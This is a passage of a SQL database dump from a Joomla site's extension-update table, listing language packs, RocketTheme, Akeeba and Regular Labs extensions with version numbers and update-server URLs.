Plugin','','','plugin','',0,'3.2.8','0802','http://updates.rockettheme.com/joomla/381/337128173','',''),(13537,20,0,'RokCommon','','pkg_rokcommon','package','',0,'3.2.8','0802','http://updates.rockettheme.com/joomla/559/1033ef39','',''),(13538,57,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(13539,57,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(13540,57,0,'French','','pkg_fr-FR','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(13541,57,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(13542,57,0,'Greek','','pkg_el-GR','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(13543,57,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(13544,57,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(13545,57,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(13546,57,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(13547,57,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(13548,57,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(13549,57,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(13550,57,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(13551,57,0,'Danish','','pkg_da-DK','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(13552,57,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(13553,57,0,'Estonian','','pkg_et-EE','package','',0,'3.9.14.2','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(13554,57,0,'Italian','','pkg_it-IT','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(13555,57,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(13556,57,0,'Persian','','pkg_fa-IR','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(13557,57,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(13558,57,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(13559,57,0,'Russian','','pkg_ru-RU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(13560,57,0,'English AU','','pkg_en-AU','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(13561,57,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(13562,57,0,'English US','','pkg_en-US','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(13563,57,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(13564,57,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(13565,57,0,'Thai','','pkg_th-TH','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(13566,57,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(13567,57,0,'German DE','','pkg_de-DE','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(13568,57,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(13569,57,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(13570,57,0,'Spanish','','pkg_es-ES','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(13571,57,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(13572,57,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(13573,57,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(13574,57,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(13575,57,0,'English CA','','pkg_en-CA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(13576,57,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(13577,57,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(13578,57,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(13579,57,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(13580,57,0,'German CH','','pkg_de-CH','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(13581,57,0,'German AT','','pkg_de-AT','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(13582,57,0,'German LI','','pkg_de-LI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(13583,57,0,'German LU','','pkg_de-LU','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(13584,57,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(13585,57,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(13586,76,0,'Akeeba Frontend Framework (FEF)','Akeeba Frontend Framework (FEF)','file_fef','file','',1,'1.0.11','','http://cdn.akeebabackup.com/updates/fef.xml','\n					https://www.akeebabackup.com/download/fef/1-0-11.html\n				',''),(13587,93,0,'Regular Labs - Sourcerer','','sourcerer','plugin','system',0,'8.2.2FREE','','https://download.regularlabs.com/updates.xml?e=sourcerer&type=.xml','https://www.regularlabs.com/extensions/sourcerer#download',''),(13588,101,0,'FOF 3.x Stable','FOF 3.x Stable','lib_fof30','library','',1,'3.5.2','','http://cdn.akeebabackup.com/updates/fof3_file.xml','\n					https://www.akeebabackup.com/download/fof3/3-5-2.html\n				',''),(13589,1,0,'Joomla','','joomla','file','',0,'3.9.16','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(13590,1,0,'Joomla','','joomla','file','',0,'3.9.16','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(13591,1,0,'Joomla','','joomla','file','',0,'3.9.16','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(13592,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'7.1.1','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','\n					https://www.akeebabackup.com/download/akeeba-backup/7-1-1.html\n				',''),(13593,1,0,'Joomla','','joomla','file','',0,'3.9.16','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(13594,1,0,'Joomla','','joomla','file','',0,'3.9.16','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(13595,1,0,'Joomla','','joomla','file','',0,'3.9.16','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(13596,1,0,'Joomla','','joomla','file','',0,'3.9.16','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(13597,3,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(13598,3,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(13599,3,0,'French','','pkg_fr-FR','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(13600,3,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(13601,3,0,'Greek','','pkg_el-GR','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(13602,3,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(13603,3,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(13604,3,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(13605,3,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(13606,3,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(13607,3,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(13608,3,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(13609,3,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(13610,3,0,'Danish','','pkg_da-DK','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(13611,3,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(13612,3,0,'Estonian','','pkg_et-EE','package','',0,'3.9.14.2','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(13613,3,0,'Italian','','pkg_it-IT','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(13614,3,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(13615,3,0,'Persian','','pkg_fa-IR','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(13616,3,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(13617,3,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(13618,3,0,'Russian','','pkg_ru-RU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(13619,3,0,'English AU','','pkg_en-AU','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(13620,3,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(13621,3,0,'English US','','pkg_en-US','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(13622,3,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(13623,3,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(13624,3,0,'Thai','','pkg_th-TH','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(13625,3,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(13626,3,0,'German DE','','pkg_de-DE','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(13627,3,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(13628,3,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(13629,3,0,'Spanish','','pkg_es-ES','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(13630,3,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(13631,3,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(13632,3,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(13633,3,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(13634,3,0,'English CA','','pkg_en-CA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(13635,3,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(13636,3,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(13637,3,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(13638,3,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(13639,3,0,'German CH','','pkg_de-CH','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(13640,3,0,'German AT','','pkg_de-AT','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(13641,3,0,'German LI','','pkg_de-LI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(13642,3,0,'German LU','','pkg_de-LU','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(13643,3,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(13644,3,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(13645,1,0,'Joomla','','joomla','file','',0,'3.9.16','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(13646,20,0,'RokSprocket Module','','mod_roksprocket','module','',0,'2.1.27','0802','http://updates.rockettheme.com/joomla/138/b61e70db','',''),(13647,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/138/2084920890','',''),(13648,20,0,'RokGallery Extension','','mod_rokgallery','module','',0,'2.45','0802','http://updates.rockettheme.com/joomla/286/21ffe006','',''),(13649,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/286/326466299','',''),(13650,20,0,'RokWeather','','','module','',0,'2.0.4','0802','http://updates.rockettheme.com/joomla/313/1307741342','',''),(13651,20,0,'RokMiniEvents','','','module','',0,'3.0.3','0802','http://updates.rockettheme.com/joomla/313/1301311221','',''),(13652,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/381/337128173','',''),(13653,20,0,'RokCommon','','pkg_rokcommon','package','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/559/1033ef39','',''),(13654,57,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(13655,57,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(13656,57,0,'French','','pkg_fr-FR','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(13657,57,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(13658,57,0,'Greek','','pkg_el-GR','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(13659,57,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(13660,57,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(13661,57,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(13662,57,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(13663,57,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(13664,57,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(13665,57,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(13666,57,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(13667,57,0,'Danish','','pkg_da-DK','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(13668,57,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(13669,57,0,'Estonian','','pkg_et-EE','package','',0,'3.9.14.2','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(13670,57,0,'Italian','','pkg_it-IT','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(13671,57,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(13672,57,0,'Persian','','pkg_fa-IR','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(13673,57,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(13674,57,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(13675,57,0,'Russian','','pkg_ru-RU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(13676,57,0,'English AU','','pkg_en-AU','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(13677,57,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(13678,57,0,'English US','','pkg_en-US','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(13679,57,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(13680,57,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(13681,57,0,'Thai','','pkg_th-TH','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(13682,57,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(13683,57,0,'German DE','','pkg_de-DE','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(13684,57,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(13685,57,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(13686,57,0,'Spanish','','pkg_es-ES','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(13687,57,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(13688,57,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(13689,57,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(13690,57,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(13691,57,0,'English CA','','pkg_en-CA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(13692,57,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(13693,57,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(13694,57,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(13695,57,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(13696,57,0,'German CH','','pkg_de-CH','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(13697,57,0,'German AT','','pkg_de-AT','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(13698,57,0,'German LI','','pkg_de-LI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(13699,57,0,'German LU','','pkg_de-LU','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(13700,57,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(13701,57,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(13702,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'7.1.1','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','\n					https://www.akeebabackup.com/download/akeeba-backup/7-1-1.html\n				',''),(13703,76,0,'Akeeba Frontend Framework (FEF)','Akeeba Frontend Framework (FEF)','file_fef','file','',1,'1.0.11','','http://cdn.akeebabackup.com/updates/fef.xml','\n					https://www.akeebabackup.com/download/fef/1-0-11.html\n				',''),(13704,93,0,'Regular Labs - Sourcerer','','sourcerer','plugin','system',0,'8.2.2FREE','','https://download.regularlabs.com/updates.xml?e=sourcerer&type=.xml','https://www.regularlabs.com/extensions/sourcerer#download',''),(13705,101,0,'FOF 3.x Stable','FOF 3.x Stable','lib_fof30','library','',1,'3.5.2','','http://cdn.akeebabackup.com/updates/fof3_file.xml','\n					https://www.akeebabackup.com/download/fof3/3-5-2.html\n				',''),(13706,1,0,'Joomla','','joomla','file','',0,'3.9.16','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(13707,1,0,'Joomla','','joomla','file','',0,'3.9.16','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(13708,1,0,'Joomla','','joomla','file','',0,'3.9.16','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(13709,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'7.1.1','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','\n					https://www.akeebabackup.com/download/akeeba-backup/7-1-1.html\n				',''),(13710,3,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(13711,3,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(13712,3,0,'French','','pkg_fr-FR','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(13713,3,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(13714,3,0,'Greek','','pkg_el-GR','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(13715,3,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(13716,3,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(13717,3,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(13718,3,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(13719,3,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(13720,3,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(13721,3,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(13722,3,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(13723,3,0,'Danish','','pkg_da-DK','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(13724,3,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(13725,3,0,'Estonian','','pkg_et-EE','package','',0,'3.9.14.2','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(13726,3,0,'Italian','','pkg_it-IT','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(13727,3,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(13728,3,0,'Persian','','pkg_fa-IR','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(13729,3,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(13730,3,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(13731,3,0,'Russian','','pkg_ru-RU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(13732,3,0,'English AU','','pkg_en-AU','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(13733,3,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(13734,3,0,'English US','','pkg_en-US','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(13735,3,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(13736,3,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(13737,3,0,'Thai','','pkg_th-TH','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(13738,3,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(13739,3,0,'German DE','','pkg_de-DE','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(13740,3,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(13741,3,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(13742,3,0,'Spanish','','pkg_es-ES','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(13743,3,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(13744,3,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(13745,3,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(13746,3,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(13747,3,0,'English CA','','pkg_en-CA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(13748,3,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(13749,3,0,'Dari 